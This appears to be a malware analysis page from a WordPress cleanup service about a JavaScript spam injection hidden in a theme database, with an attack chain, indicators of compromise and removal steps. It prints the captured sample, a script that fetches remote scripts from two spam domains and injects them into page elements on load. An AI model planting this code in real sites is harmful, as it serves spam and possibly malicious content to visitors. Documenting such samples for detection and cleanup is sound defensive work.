High JS Injection 🛡️ Zero-Day Variant

JavaScript Fetch-Based Spam Injection

Case ID: seo-spam-database-injection • Detected: 2026-01-19

Impact Radius
Theme Database (likely in theme or custom files)
Removal Difficulty
Moderate
Recurrence Rate
Medium
Key Symptom
Injects spam content from external sources into HTML elements on the page.

Evidence Screenshots

Malware Evidence

Technical Analysis

The malicious code utilizes the JavaScript fetch function to load external scripts from dubious URLs. These scripts are then injected into the site dynamically via the document’s inner HTML properties. The code likely masquerades as a legitimate part of a WordPress theme, making it unsusceptible to basic scanners. The malware gets hidden within theme files, leveraging the fetch function to avoid direct script inclusion that simple scanners might catch.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. Step 1: The malicious script is embedded within the theme database, pretending to be legitimate or obfuscated as normal theme operations.
  2. Step 2: Upon page load, the JavaScript fetch API is called to pull external scripts from spammy URLs.
  3. Step 3: The fetched contents are injected into specific HTML elements, inserting potentially harmful or deceptive content into the webpage.

Code Signature(s)

FILE: malware-sample.js

<script><!-- [et_pb_line_break_holder] -->    fetch('https://sengatanlebah.shop/back.js').then((resp) => resp.text()).then(y => document.getElementById("datax").innerHTML=y);<!-- [et_pb_line_break_holder] -->    fetch('https://jasabacklink.buzz/backlink/sigma.js').then((resp) => resp.text()).then(y => document.getElementById("info1").innerHTML=y);<!-- [et_pb_line_break_holder] -->    fetch('https://jasabacklink.buzz/backlink/teratai.js').then((resp) => resp.text()).then(y => document.getElementById("info2").innerHTML=y);<!-- [et_pb_line_break_holder] --></script>

Indicators of Compromise (IOCs)

  • sengatanlebah.shop/back.js
  • jasabacklink.buzz/backlink/sigma.js
  • jasabacklink.buzz/backlink/teratai.js

Removal Protocol

  1. Step 1: Identify and access affected theme file(s), usually .php or .js files within the theme directory.
  2. Step 2: Remove any suspicious fetch calls or similar JavaScript code fetching from external domains not owned by you.
  3. Step 3: Verify the integrity of your WordPress theme by comparing it against a clean, original version and restore any compromised files.

Status: Active Threat.
Verification: Verified by MD Pabel.

Need help removing this?

This malware is rated as Moderate difficulty. If you are unsure, do not attempt manual removal.

Hire MD Pabel for Cleanup